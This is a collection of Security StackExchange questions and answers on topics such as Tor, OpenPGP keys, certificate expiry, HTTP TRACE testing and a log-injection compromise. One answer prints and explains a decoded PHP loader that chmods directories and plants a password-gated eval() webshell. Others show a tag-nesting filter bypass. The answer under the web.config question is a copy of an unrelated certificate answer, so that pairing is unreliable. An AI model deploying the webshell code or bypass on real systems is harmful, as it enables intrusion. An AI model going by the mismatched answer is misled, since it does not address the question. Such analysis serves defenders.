infrastructure) then this could make sense in a business way.
{ "source": [ "https://security.stackexchange.com/questions/31303", "https://security.stackexchange.com", "https://security.stackexchange.com/users/975/" ] }
31,337
A technique for avoid filtering of common words is the one I described in the title. However, why does this technique work? SELECT isn't the same as SELSELECTECT for example.
Let's say I blacklisted the word <script> and replace it with nothing. Then <scr<script>ipt> becomes <script> . This is why well-written html sanitizers/purifiers apply the rules recursively. That is only when the last sanitation step made no changes to the content will it stop/not apply another round of the processing rules. (It also likely will fail and return no content if too many processing rounds are necessary).
{ "source": [ "https://security.stackexchange.com/questions/31337", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15194/" ] }
31,376
Is it possible to create a CA certificate (even unsigned), which is only allowed to sign certificates for specific limited domain(s), so that it can't be misused for other domains?
No. (I assume you are talking about certificates for SSL servers.) Technically no. What would be closest to that would be the Name Constraints extension (see section 4.2.1.10 of RFC 5280 ) ( OID 2.5.29.30 ), which theoretically allows for restricting a complete PKI subtree to an explicit set of domains (and subdomains thereof). The extension supports both whitelist and blacklist semantics (in your case, you would like a whitelist). In practice, however, this fails for two reasons: The Name Constraints extension is mostly unsupported by existing implementations of SSL. They are likely to ignore the extension. When a SSL client connects to a server, it looks for the server name in the server certificate, as specified in RFC 2818, section 3.1 . It will look for names of type dNSName in a Subject Alt Name extension, and these names are covered (theoretically) by the Name Constraints . However, if the server certificate lacks a Subject Alt Name extension, clients will fall back on the Common Name (in the subjectDN ). The Common Name is not in scope of the Name Constraints . This means that a certificate could evade the name constraints by omitting the Subject Alt Name extension and putting an arbitrary server name in its Common Name. (This is the whole story of X.509: lots of hooks and provisions for many useful features, which don't work because of lack of support from implementation and lack of coordination between specification bodies.)
{ "source": [ "https://security.stackexchange.com/questions/31376", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21121/" ] }
31,451
I've set up my VPS'ssh server to accept only key-based identification: I disabled password-based connection. As a consequence I am connecting from home with an RSA key generated prior to password disabling on my VPS. Of course I've copied the public key into the ~/.ssh/authorized file before that. Now I want to do the same thing from work, generating a new key pair (I've read it is clearly better to generate a new key pair, one for each source of connection). I guess the best thing to do is to generate the key from my workplace. But then I am facing the issue of transferring the public key from my workplace to the VPS. Since I disabled the password-based connection, I won't be able to transfer it directly from work. I could re-enable password authentication just before returning to my workplace. And disable it from my workplace once I am able to connect into my VPS. But then I would like to know: is it secure to send the public key by email to myself?
The public key is public , meaning that everybody can know it without endangering security. No problem in putting it in an email, then. The potential issue would be an active attacker modifying the email while in transit, to replace your public key with his public key. To guard yourself against such attacks, compute a fingerprint of the file you are about to send by email (use the ubiquitous md5sum utility on it), and write the hash value on a piece of paper (which you keep in your wallet). When you are back at home, recompute the hash over the received file, and compare it with the value on the paper. If they match, then everything is fine.
{ "source": [ "https://security.stackexchange.com/questions/31451", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16718/" ] }
31,463
Every SSL certificate has an expiration date. Now suppose some site's certificate expired an hour ago or a day ago. All the software by default will either just refuse to connect to the site or issue security warnings. This recently happened to Windows Azure Storage and since most of software in dependent services defaulted to refusing to connect lots of services experienced major degradation. Now what's the logic in here? I mean a day ago the certificate was valid and everyone was happy to use it. Now a day later it's formally expired and noone likes it anymore. I've read this answer and I don't find it convincing for this specific edge case. To every security model there is a threat model. What's the threat model here? What could have happened between now and a day ago that a certificate is treated to be unusable to such extent that we even refuse to connect to the site?
When a certificate is expired, its revocation status is no longer published. That is, the certificate might have been revoked long ago, but it will no longer be included in the CRL. Certificate expiration date is the cut-off date for CRL inclusion. That's the official reason why certificates expire: to keep CRL size bounded. (The unofficial reason is to make certificate owners pay an annual fee.) So you cannot trust an expired certificate because you cannot check its revocation status . It might have been revoked months ago, and you would not know it.
{ "source": [ "https://security.stackexchange.com/questions/31463", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2052/" ] }
31,465
I have two machines running windows OS with IIS and window OS with MS SQL. In the production web.config file I configure the IIS to use a user name and password when connecting to the DB and then I encrypt it with a key using RSA. The key will be generated using aspnet_regiis and exported into all IIS Machines. Each production server holds only the encrypted web.config file (and an imported key in the secured in the IIS). The other approach will be to define in the web.config a connection using windows authentication. This will be a lot less work on my side. Which practice is better ? Which is safer?
When a certificate is expired, its revocation status is no longer published. That is, the certificate might have been revoked long ago, but it will no longer be included in the CRL. Certificate expiration date is the cut-off date for CRL inclusion. That's the official reason why certificates expire: to keep CRL size bounded. (The unofficial reason is to make certificate owners pay an annual fee.) So you cannot trust an expired certificate because you cannot check its revocation status . It might have been revoked months ago, and you would not know it.
{ "source": [ "https://security.stackexchange.com/questions/31465", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21176/" ] }
31,549
Firefox 19 ships with pdf.js as the default PDF reader . One of the main stated goals is to reduce the exposure of users to the often vulnerable Adobe PDF reader/plugin. So what new risks does pdf.js bring? An attacker that can get a user to browse to their malicious PDF could also get the user to browse to a malicious web page. Any vulnerabilities in the HTML5 renderer or javascript interpreters could have been exploited that way anyway.
I actually think the Mozilla devs have been pretty smart with this. Historically, most PDF exploits have come from the rendering engine rather than the parsing side. Adobe got wise early to the fact that malformed structure and content would screw them, and put a lot of effort into making sure that their parsing engine was rock solid. If you look at some of the recent 0-day stuff for Adobe Reader, you'll see that most of it relies on bugs in the rendering engine and some of the more exotic areas of content handling. The new Firefox PDF engine simply takes the structure of the PDF and translates it into a DOM structure, which can be rendered by the browser's standard HTML renderer and interacted with via JavaScript. This removes a huge portion of the attack surface, and allows them to entirely focus on the security of the document translation engine. Any real exploitable bugs are likely to be reliant on a secondary bug that could be exploited through other means anyway. If there are exploits, I see them coming from the following areas: 3rd party objects being loaded into the page, which can then exploit a separate Java / Flash / HTML5 / etc. bug. Probably preventable by using a restrictive content origin policy. Bypassing content escaping so that arbitrary JavaScript can be executed in the context of the PDF. Again a lot of the significance of this is related to origin policies. Buffer overflows in any native code responsible for PDF translation. Since most of the engine seems to be based in JavaScript, I'm unsure as to how likely this is. All in all, I don't think it brings much of an increased security risk, and once it's been around for a few months I'd consider it an ideal drop-in replacement for Adobe PDF plugins, which have been a source of many headaches.
{ "source": [ "https://security.stackexchange.com/questions/31549", "https://security.stackexchange.com", "https://security.stackexchange.com/users/18452/" ] }
31,589
If I use a Tor router to browse the regular internet, my traffic must leave the Tor network through an exit node. Apparently the exit node can see the data originally sent. Is this true? If an adversary wanted to deanonymize me, wouldn't they just have to subpoena the exit node owner or hack it? Does this mean a proxy is about as safe, since the above applies to both?
In Tor , the user (you) chooses a random path through several nodes for its data. The first node in the path knows your IP address, but not what you send or where. The last node ("exit node") knows the target server address and sees the data (unless SSL is used, of course), but not your IP address. Every node in the path knows only the addresses of the previous and the next nodes in the path. If a government is intent on unraveling the privacy of Tor, then its best chance is to setup and operate a lot of nodes (which, of course, will not say "provided by your friendly government"). If your computer randomly chooses a path which begins by a government-controlled node and ends with another government-controlled node, then both nodes can correlate their data pretty easily and reveal both your IP and the target server (and sent data, if no SSL). Correlation is simple because while encryption hides the contents of data, it does not hide the length . If node A sees a 4138-byte request entering the Tor network from your IP, and node B sees a 4138-byte request within the next second exiting the Tor network and destined to server www.example.com , then node A and node B, by collating their data, will infer that your IP was involved with a communication to www.example.com . It can easily be proven that if the hostile party does not eavesdrop on or hijack both the entry and exit nodes, then your privacy is maintained. But if they do , then privacy evaporates like a morning mist under the midday Sun.
{ "source": [ "https://security.stackexchange.com/questions/31589", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6372/" ] }
31,594
Since most key types can be used for multiple purposes, namely certification, authentication, encryption and signatures, one could simply use one key for everything - which is a bad idea, as elaborated e.g. by Thomas Pornin . So one should use different key pairs for different purposes, with different backup methods (decryption should remain possible "forever", while signature keys can "simply" be replaced) and securing. But I haven't managed to find a one-in-all write up of best practice summarizing answers to the following questions: What type of key should be used for which purpose (RSA, DSA, ... how many bits, when should they expire etc)? Should all keys be (separate?) subkeys of the certification master key or be individual master keys signed by the former one? I found some non-trivial guides on how to remove the secret master key from your day-to-day used subkeys, but is the trouble involved really worth having a shorter chain-of-trust to these keys compared to an entirely separate certification key? How important is it actually to keep the certification key offline when one uses a) a "really" strong passphrase or b) a hardware device like an OpenPGP card?
About Using Subkeys Use one primary key for each identity you need, otherwise, use subkeys. Examples for using multiple primary keys: You don't want to mix up your private and professional keys You need some key not connected with your "real life" identity, eg. when prosecuted by the authorities Examples for using subkeys: You want to use multiple keys for multiple devices (so you won't have to revoke your computer's key if you lose your mobile) You want to switch keys regularly (eg., every some years) without losing your reputation in the Web of Trust I recently posted about How many OpenPGP keys to make in another answer. About Key Sizes The GnuPG developers recommend using 2k RSA keys for both encryption and signing. This will be definitely fine for currently used subkeys. As your primary key will not be used for anything but keysigning and validating signatures (and revocation of course), it is seen as good practice to have a quite huge key here, while using smaller sizes (huge enough for time you will need them) for subkeys (which will speed up calculations and reduce file sizes). I had a more detailed answer facing RSA with DSA/Elgamal for another question at Superuser, go there for reading further. Key Expiration There are two ways a private key could get compromised: Somebody is able to steal it from you Somebody is able to recalculate it from your public key First is a matter of your computer's security (and how you use your key, read below), second is a matter of time. Today (and probably the next few years), RSA 2k keys will be totally fine. But computing power rises dramatically, so an attacker needs less CPU cores/graphic cards/computers/power plants to recalculate your private key. Also, glitches could be found in the used algorithms, leading to much less computing power needed. Quantum computers could speed up things even more. A key expiration date will limit the validity of your key to a given time you expect it to be secure. Any attacker cracking it afterwards will only be able to read encrypted data send to you, but nobody will use it any more; if an attacker gets hold of your key and you stay unnoticed, at least it will stop him from having use from it after a given time. Expiring your primary key will let you lose all your Web of Trust reputation, but at least invalidates your key after a given time if you lose access (what should never ever happen, read on at the end of my answer). Storing your Primary Key Offline Your primary key is the most crucial one. All trust - both incoming and outgoing - is connected with this. If somebody gets access to it, he's able to: Create new keys using your name (and GnuPG always uses your newest subkey by default!) Revoking subkeys and primary keys Issuing trust to other keys, which is the worst thing to happen: An attacker could create a new key, giving it trust from your old one and then revoke your old key, leaving you without any access to your "moved" identity - he's literally overtaking your identity . How important is it actually to keep the certification key offline when one uses a) a "really" strong passphrase [...]? Your computer always could be hacked or infected by some malware downloading your keys and installing a key logger to fetch your password (and this is not a matter of which operating system you use, all of them include severe security holes nobody knows about at this time). Keeping your primary (private) key offline is a good choice preventing these problems. It includes some hassles, but reduces risks as stated above. Highest security would of course mean to use a separate, offline computer (hardware, no virtual machine!) to do all the key management using your primary key and only transferring OpenPGP data (foreign keys and signatures you issued) using some thumb drive. b) a hardware device like an OpenPGP card? OpenPGP smart cards are somewhere in between storing it offline on a thumbdrive, but attaching it to your computer for signing and using another offline computer dedicated to this purpose. Your private key will never leave the smart card (except for backup purpose) which requires an "admin PIN", all signing and even key creation will happen inside the card. "Using" your key (encryption, signing, giving trust) will only require a "user PIN", so even if you connect the card to a "harmed" computer, the attacker will not be able to completely overtake your ID. You can store your public key wherever you want, for having real use of OpenPGP, you even should send it (and your other public keys) to the keyservers. And do not forget to create and print a revocation certificate of your primary key. Losing your private key not having this certificate means there is a key you cannot access any more lingering on the keyservers and you can't do anything about it . Print it, possibly several times, and put it to places you trust. Your parents, some bank deposit box, ... - if this certificate leaks, worst thing to happen is losing your Web of Trust.
{ "source": [ "https://security.stackexchange.com/questions/31594", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3272/" ] }
31,659
How can I test for HTTP TRACE on my web-server? I need to train a Tester how to verify that the HTTP TRACE method is disabled. Ideally I need a script to paste into Firebug to initiate a https connection to return the web server response to a HTTP TRACE command. Background: Our security Pen Testers identified a HTTP TRACE vulerability and we need to prove that it is fixed. References: OWASP on XST Apache Week
Simplest way I can think of is using cURL (which is scriptable). curl -v -X TRACE http://www.yourserver.com Running it against an Apache server with TraceEnable Off correctly returns HTTP/1.1 405 Method Not Allowed (just tested on an Apache 2.2.22) This also works on HTTPS sites, provided that cURL has the correct information supplied to the SSL layer. This is the lazy man's check of Google curl --insecure -v -X TRACE https://www.google.com/ ...it negotiates the connection (does not verify the certificate chain, but that's not the issue here since we want to check on TRACE status), and responds 405: * Server certificate: * subject: C=US; ST=California; L=Mountain View; O=Google Inc; CN=www.google.com * start date: 2013-02-20 13:34:56 GMT * expire date: 2013-06-07 19:43:27 GMT * subjectAltName: www.google.com matched * issuer: C=US; O=Google Inc; CN=Google Internet Authority * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway. > TRACE / HTTP/1.1 > User-Agent: curl/7.25.0 (x86_64-suse-linux-gnu) libcurl/7.25.0 OpenSSL/1.0.1c zlib/1.2.7 libidn/1.25 libssh2/1.4.0 > Host: www.google.com > Accept: */* < HTTP/1.1 405 Method Not Allowed
{ "source": [ "https://security.stackexchange.com/questions/31659", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2210/" ] }
31,689
A few days ago one of my webhosting customers had their FTP login compromised, and the attacker modified his index.php file to include some extra code, and roughly twelve thousand other bots have been trying to access it via a POST operation since I'm okay at PHP but no genius, but from what I've been able to garner it takes the (encrypted) data included in the POST, decrypts it together with the contents of another file left behind on the host, and sends a response packed into a HTTP 503 header. From the behavior, I get the feeling this system was set up as a control host for a botnet. I've managed to save a copy of the PHP code as well as a packet capture of one of the bots trying to POST after I'd already deactivated the site... But now what do I do with it? I don't have the time or expertise to further analyze the damn thing myself, what groups should I forward the lot to?
If you want it analysed for business reasons then you need to find an appropriately skilled forensic incident response consultant (excuse the jargon: 'A log analysis guy'). These generally cost money, lots of it. Bear in mind though that most botnet deployments aren't targeted and are very wide-spread. There probably isn't much to learn about it that isn't already well-known and which affects everyone else. Groups that deal with advanced threats won't be terribly interested in this sort of thing, but you might have luck with an AV vendor. Symantec, Sophos, etc sometimes like to collate this kind of data for their glossy white papers. The most interesting logs are going to be the ones just before the suspicious traffic starts when the botnet actually exploits the system, since that will allow you to do a post-mortem on the attack. However I'm going to use my amazing psychic abilities to assert that something wasn't appropriately patched and that's how the bot got in. Addendum: For the love of the Gods don't just give access to your systems (or sensitive data on your systems) to some random person on this site.
{ "source": [ "https://security.stackexchange.com/questions/31689", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2467/" ] }
31,748
The other day, there was a web developer mailing list thread about a fundraiser page. One person noted that the page with the credit card form was HTTP, not HTTPS. In response, one person said that since the target of the form was HTTPS, it's not a problem Nah, the form's submitted via https, served by Stripe. The site itself is http, though... However, someone argued in response that that is not enough You have not established that the form is secure. A MITM may modify the HTML in the response for http://example.com/ to replace the form's "action" attribute. The website in question has since changed such that going to http://example.com takes you to https://example.com instead, so it's (hopefully) secure now, but I want to know for future reference. Is a credit card form being on HTTP, but the target being HTTPS, a security risk for MITM attacks?
Yes, that last someone is correct, in addition to encryption ( confidentiality ) HTTPS gives you the assurances that the form is coming from where you think it is ( authentication ), and that it has not been interfered with in transit ( integrity ). Without HTTPS the form could be modified by a MITM as described. It's Not using HTTPS for this is simply bad practise (since the user is often the weakest link), when entering important data the user should just expect to see HTTPS (padlock/green bar/whatever) at every step, no exceptions. Most browsers will warn by default if you POST from a HTTPS page to a non-HTTP URL, but they don't all clearly indicate that your data is being sent securely in the opposite case. Lack of HTTPS also means that site won't be using "secure" cookies. See also: Is posting from HTTP to HTTPS a bad practice? Properly addressing this issue requires HTTP STS ( RFC6797 ), though a boot-strapping issue remains with first HTTP requests in most cases. A similar issue is the practise of using an iframe to a HTTPS site within a HTTP page, e.g. 3rd party credit card service. In this case, though the form and the post are HTTPS, there's no assurance of integrity in the non-HTTPS content containing the iframe . The browser doesn't show the form is HTTPS (at least not in the normal way, if at all), so this also violates the expectations of a security conscious user.
{ "source": [ "https://security.stackexchange.com/questions/31748", "https://security.stackexchange.com", "https://security.stackexchange.com/users/8335/" ] }
31,916
So one of the Invision Power Board installations on my server was recently compromised. I found what seemed to be the attack (using PHP in the query string and carefully crafted cookies), and I blocked URL strings with PHP tags in the query string. However, the attack signature in my logs from the actual log looks slightly different than the attack signature of my tests. It looks like they are sending PHP in the user agent string. Can anyone help me figure out what this is doing? Also, would blocking user agent strings with a PHP tag fix this? 93.115.84.154 - - [12/Feb/2013:04:03:23 -0400] "GET / HTTP/1.0" 200 4186 "" "<?php eval(base64_decode(\"QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KDQphZGRMb2FkZXIoKTsNCiRkYXRhID0gQG9wZW5kaXIoJy4nKTsNCg0Kd2hpbGUgKCRmaWxlID0gQHJlYWRkaXIoJGRhdGEpKQ0Kew0KCSRmaWxlID0gdHJpbSgkZmlsZSk7DQoJaWYgKCEkZmlsZSB8fCBwcmVnX21hdGNoKCcvXlwuKyQvJywgJGZpbGUpIHx8ICFpc19kaXIoJGZpbGUpKSBjb250aW51ZTsNCglhZGRMb2FkZXIoJGZpbGUpOw0KfQ0KDQpAY2xvc2VkaXIoJGRhdGEpOw0KDQpmdW5jdGlvbiBhZGRMb2FkZXIoJGRpciA9ICcnKQ0Kew0KICAgIGlmICgkZGlyKSAkZGlyIC49ICcvJzsNCiAgICBAY2htb2QoJGRpciwgNzc3KTsNCiAgICBAc3lzdGVtKCJjaG1vZCA3NzcgJGRpciIpOw0KICAgIA0KICAgICRmcCA9IGZvcGVuKCJ7JGRpcn0yZTAzMGJhMzQ4ZWI0Nzg3N2I5OTQ5MzRkNDIwYzQ3NS5waHAiLCAidyIpOyANCiAgICBmd3JpdGUoJGZwLCBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNnMEtRR2x1YVY5elpYUW9KMkZzYkc5M1gzVnliRjltYjNCbGJpY3NJREVwT3cwS1FHbHVhVjl6WlhRb0oyUmxabUYxYkhSZmMyOWphMlYwWDNScGJXVnZkWFFuTENBMk1DazdEUXBBYVc1cFgzTmxkQ2duYldGNFgyVjRaV04xZEdsdmJsOTBhVzFsSnl3Z05qQXBPdzBLUUhObGRGOTBhVzFsWDJ4cGJXbDBLRFl3S1RzTkNnMEtKR1JoZEdFZ1BTQkFkVzV6WlhKcFlXeHBlbVVvWW1GelpUWTBYMlJsWTI5a1pTaDBjbWx0S0VBa1gxQlBVMVJiSjJSaGRHRW5YU2twS1RzTkNnMEthV1lnS0VBaGFYTmZZWEp5WVhrb0pHUmhkR0VwSUh4OElHMWtOU2drWkdGMFlWc25jR0Z6YzNkdmNtUW5YU2tnSVQwZ0oyUXpaR1kwTXpsak0yVTBZakpqTkRFNU1qQmtPR1V5TnpNek1URXpNak0ySnlrZ1pYaHBkRHNOQ21sbUlDaEFKR1JoZEdGYkoyTnZaR1VuWFNrZ1pYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtDUmtZWFJoV3lkamIyUmxKMTBwS1RzTkNtbG1JQ2hBSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFNrZ2NISnBiblFnSkdSaGRHRmJKMk5vWldOclgyTnZaR1VuWFRzTkNnMEtQejQ9JykpOw0KCWZjbG9zZSgkZnApOw0KDQoJaWYgKGZpbGVfZXhpc3RzKCJ7JGRpcn0yZTAzMGJhMzQ4ZWI0Nzg3N2I5OTQ5MzRkNDIwYzQ3NS5waHAiKSkNCgl7DQogICAgICAgICRjayA9ICIxODIzNjQ5MzY1ODIwMzU0IjsNCgkgICAgcHJpbnQgIiRjazp7Kn06JGRpcjp7Kn06IjsNCgkJZXhpdDsNCgl9DQp9\")); ?>"
As Thomas pointed out, this attack is designed to exploit poor content handling in log utilities. There are many "log to HTML" engines that simply extract the text of the logs and place them blindly into a HTML template. When the user requests the HTML page from the server, the <?php tags are parsed by the PHP engine and the code is executed. Since many servers allow .html files to be handled by PHP, this has a reasonable chance of working. Let's take a look at the payload. The block of base64 that you see in that attack string decodes to the following PHP script: @ini_set('allow_url_fopen', 1); addLoader(); $data = @opendir('.'); while ($file = @readdir($data)) { $file = trim($file); if (!$file || preg_match('/^\.+$/', $file) || !is_dir($file)) continue; addLoader($file); } @closedir($data); function addLoader($dir = '') { if ($dir) $dir .= '/'; @chmod($dir, 777); @system("chmod 777 $dir"); $fp = fopen("{$dir}2e030ba348eb47877b994934d420c475.php", "w"); fwrite($fp, base64_decode('PD9waHANCg0KQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KQGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA2MCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgNjApOw0KQHNldF90aW1lX2xpbWl0KDYwKTsNCg0KJGRhdGEgPSBAdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZSh0cmltKEAkX1BPU1RbJ2RhdGEnXSkpKTsNCg0KaWYgKEAhaXNfYXJyYXkoJGRhdGEpIHx8IG1kNSgkZGF0YVsncGFzc3dvcmQnXSkgIT0gJ2QzZGY0MzljM2U0YjJjNDE5MjBkOGUyNzMzMTEzMjM2JykgZXhpdDsNCmlmIChAJGRhdGFbJ2NvZGUnXSkgZXZhbChiYXNlNjRfZGVjb2RlKCRkYXRhWydjb2RlJ10pKTsNCmlmIChAJGRhdGFbJ2NoZWNrX2NvZGUnXSkgcHJpbnQgJGRhdGFbJ2NoZWNrX2NvZGUnXTsNCg0KPz4=')); fclose($fp); if (file_exists("{$dir}2e030ba348eb47877b994934d420c475.php")) { $ck = "1823649365820354"; print "$ck:{*}:$dir:{*}:"; exit; } } Let's dissect this a bit... The @ini_set line enables URL handlers in fopen calls, so external resources can be fetched. The @ prefix suppresses any errors that might occur if the call fails. The call to addLoader() does the main bulk of the work. I'll go into this in a moment. @opendir('.') obtains a handle to the current directory. The while loop runs through every sub-directory in the directory, and calls addLoader($file) for each. It uses a regex to skip the . and .. entries. Don't be fooled by the variable name - this does not loop through files. Finally it calls @closedir($data) . Nice of it to clean up! But what does addLoader do? Essentially it attempts to chmod 777 every directory it can find, then dumps a PHP file called 2e030ba348eb47877b994934d420c475.php into them, with some contents taken from a base64 string. The final block of code seems to be some kind of mechanism to let the attacker identify which paths were successfully written to, perhaps using a magic number for automation. Side note: I can't find any reference to the file name hash online or in any hash database I know of. Let's dissect that base64: <?php @ini_set('allow_url_fopen', 1); @ini_set('default_socket_timeout', 60); @ini_set('max_execution_time', 60); @set_time_limit(60); $data = @unserialize(base64_decode(trim(@$_POST['data']))); if (@!is_array($data) || md5($data['password']) != 'd3df439c3e4b2c41920d8e2733113236') exit; if (@$data['code']) eval(base64_decode($data['code'])); if (@$data['check_code']) print $data['check_code']; ?> This is simple enough. The first few calls try to set up a permissive environment, where external resources can be loaded and scripts can run for up to 60 seconds. It takes a POST parameter called data and deserialises it into an array, and checks that the password matches a hard-coded MD5 hash. I tried looking up this hash in a few databases, but couldn't find a corresponding plaintext. If the password is correct, it then goes on to check for a code parameter, which it then executes. It also has a check_code option, which is presumably for verifying that the code arrived properly after transport encoding and decoding was performed. So, all in all, this is a pretty bog-standard PHP shell with a delivery payload that tries to ensure maximum coverage in case of any writeable sub-directory.
{ "source": [ "https://security.stackexchange.com/questions/31916", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21451/" ] }
32,003
Upon reviewing the Logs generated by different SIEMs (Splunk, HP Logger Trial and the AlienVault platform’s SIEM) I noticed that for some reason quite a few users tend to make the mistake of typing their passwords in the username field, either in the OS Domain logon, or within web applications. I am guessing those are people who cannot type without looking at the keyboard and in trying to do so, doing it fast, end up typing their passwords in the wrong field. This means that the password is sent in plain text everywhere in the network and end up recorded on the logs with an event that says something along the lines: User P@$$w0rd does not exist [...] Or An account failed to login: P@$$w0rd [...] (where P@$$w0rd is the actual user's password) It becomes pretty obvious to work out to whom the passwords belong: usually the previous or very next (un)successful event on the same log file will tell you an event triggered by the same user. Any other Analyst, looking at the logs, could get someone else’s credentials without the due owner even being aware of that; the worst case scenario is network eavesdropping, or actual log file compromise. I am looking for a general guidance to help preventing this. I assume simply masking the username is not feasible and even if it were, this would probably eliminate a lot of the log analysis for not being able to tell who did what. Note: There is already a post on a similar issue, but I am trying to address a way to prevent it. What's the risk if I accidently type my password into a username field (Windows logon)? Accepted Answer: I wish I could select a few answers from the list. Unfortunately I have to stick to just one in the forum, but in practice I can combine them. Thanks very much for all the answers; I see there is no single solution. As I agree that adding 'things' add complexity which increase likelihood of security holes, I have to agree with most of the voters that @AJHenderson has the most elegant and simplest answer as a first approach. Definitely SSL and a simple code verification on the server or even at the client side. As I am looking to mitigate not against malicious users, but the distracted ones, this will do fine. Once this is in place, we can start looking at expanding the implementation to ill-intended users if appropriate. Thanks ever so much again for everyone's input.
One thought is to not allow form submission if there is not a value in the password box. Generally if they accidentally entered the password in the username, then there likely isn't going to be anything in the password dialog. It is worth noting that this does not have to be simply done client side, but could also be done on a server as long as the transport used is secure and the input is not logged until after passing a check about the password field not being empty.
{ "source": [ "https://security.stackexchange.com/questions/32003", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20008/" ] }
32,064
So, I keep finding the conventional wisdom that 'security through obscurity is no security at all', but I'm having the (perhaps stupid) problem of being unable to tell exactly when something is 'good security' and when something is just 'obscure'. I checked other questions relating tangentially to this, and was unable to figure out the precise difference. For example: Someone said using SSH on a nonstandard port counts as security through obscurity. You're just counting on the other person to not check for that. However, all SSH is doing is obscuring information. It relies on the hope that an attacker won't think to guess the correct cryptographic key. Now, I know the first circumstance (that someone would think to check nonstandard ports for a particular service) is far more likely than the second (that someone would randomly guess a cryptographic key), but is likelihood really the entire difference? And, if so, how am I (an infosec n00b, if that isn't already abundantly clear) supposed to be able to tell the good (i.e. what's worth implementing) from the bad (what isn't)? Obviously, encryption schemes which have been proven to be vulnerable shouldn't be used, so sometimes it's more clear than others, but what I'm struggling with is how I know where the conventional wisdom does and doesn't apply. Because, at first blush, it's perfectly clear, but when I actually try to extrapolate a hard-and-fast, consistently applicable algorithm for vetting ideas, I run into problems.
The misconception that you're having is that security through obscurity is bad. It's actually not, security only through obscurity is terrible. Put it this way. You want your system to be complete secure if someone knew the full workings of it, apart from the key secret component that you control. Cryptography is a perfect example of this. If you are relying on them 'not seeing your algorithm' by using something like a ROT13 cipher it's terrible. On the flip side if they can see exactly the algorithm used yet still cannot practically do anything we see the ideal security situation. The thing to realize is that you never want to count on obscurity but it certainly never hurts . Should I password protect / use keys for my SSH connection? Absolutely. Should I rely on changing the server from 22 to port 2222 to keep my connection safe? Absolutely not. Is it bad to change my SSH server to port 2222 while also using a password? No, if anything this is the best solution. Changing ("Obscuring") the port will simply cut down on a heap of automatic exploit scanners searching normal ports. We gain a security advantage through obscurity which is good, but we are not counting on the obscurity. If they found it they still need to crack the password. TL;DR - Only counting on obscurity is bad. You want your system to be secure with the attacker knowing it's complete workings apart from specifically controllable secret information (i.e. passwords). Obscurity in itself however isn't bad, and can actually be a good thing. Edit: To more precisely answer your probability question, yes in a way you could look at it like that, yet do so appreciating the differences. Ports range from 1-65535 and can be quickly checked within 1 minute with a scanner like nmap. "Guessing" a random say 10 digit password of all ascii characters is 1 / 1.8446744e+19 and would take 5.8 million years guessing 100,000 passwords a second. Edit 2: To address the comment below. Keys can be generated with sufficient entropy to be considered truly random ( https://www.rfc-editor.org/rfc/rfc4086 ). If not it's a flaw with the implementation rather than the philosophy. You're correct in saying that everything relies on attackers not knowing information (passwords) and the dictionary definition of obscurity is "The state of being unknown", so you can correctly say that everything is counting on a level of obscurity. Once more though the worth comes down to the practical security given the information you're able to control remaining unknown. Keys, be it passwords or certificates etc, are (relatively) simple to maintain secret. Algorithms and other easy to check methods are hard to keep secret. "Is it worth while" comes down to determining what is possible to keep unknown, and judging the possibility of compromise based off that unknown information.
{ "source": [ "https://security.stackexchange.com/questions/32064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20350/" ] }
32,089
I'm starting to study for Security+ using Darril Gibson's book. I took the pre-exam and one of the questions is “What is the most important security benefit of a clean desk policy?” The choices are: Prevent illnesses due to viruses and bacteria Presents a positive image to customers Ensures sensitive data and passwords are secured Increases integrity of data The bold answer is correct, and the author's explanation is: A clean desk policy requires users to organize their areas to reduce the risk of possible data theft and password compromise. Can someone explain what an organized desk has to do with security? I think this question only applies if the user stores his password in paper format.
Clean desks policies are rather literal in the sense they don't mean that the papers on your desk need to be organized...They mean that you're not allowed to have papers on your desk at all. So, no papers left unlocked on a desk mean no papers with sensitive information for others to trawl through after hours. Sensitive data doesn't only include password. Engineering designs, sensitive communications, financial information...There is lots of data that could be on paper that a company wouldn't want left around for just anyone to find.
{ "source": [ "https://security.stackexchange.com/questions/32089", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15194/" ] }
32,114
I understand that a MAC algorithm takes a message and a private key as input and hashes them to a value. I understand that senders and receivers often use MACs to authenticate a message and check the integrity of a message. If a sender/receiver successfully computes the same mac, then (1) the receiver has assurance that the sender has the secret key (2) the receiver has assurance that the message was not tampered with in sending (because otherwise it would generate a new mac value). I also understand that digital signatures are somehow different from MACs. But it seems like both verify the sender and authenticity of the message. If you have a successful MAC scheme set up you know that the message (1) is coming from a person with the key (handling authentication) and (2) has not been tampered with (handling tampering). So what do digital signatures do that MACs don't? What's the difference?
In both MAC and digital signature schemes, you have two algorithms: Generation : given the message m and a key K 1 , compute the MAC value or signature s . Verification : given the message m , a key K 2 and the MAC value or signature s , verify that they correspond to each other (the MAC value or signature is valid for the message m , using verification key K 2 ) With a MAC, keys K 1 and K 2 are identical (or can be trivially recomputed from each other). With a signature, the verification key K 2 is mathematically linked with K 1 but not identical, and it is unfeasible to recompute K 1 from K 2 or to generate valid signatures when you only know K 2 . Thus, signatures dissociate the generation and verification powers. With a MAC, any entity who can verify a MAC value necessarily has the power to generate MAC values of its own. With signatures, you can make the verification key public, while keeping the generation key private. Signatures are when you want to produce a proof verifiable by third party without having to entrust these third parties with anything. Application: a CA (like Verisign or Thawte or whatever) issues a certificate to a SSL server. Everybody , and in particular your Web browser, can verify that the certificate issued to the SSL server has indeed been signed by Verisign/Thawte/whatever. But this does not give you the 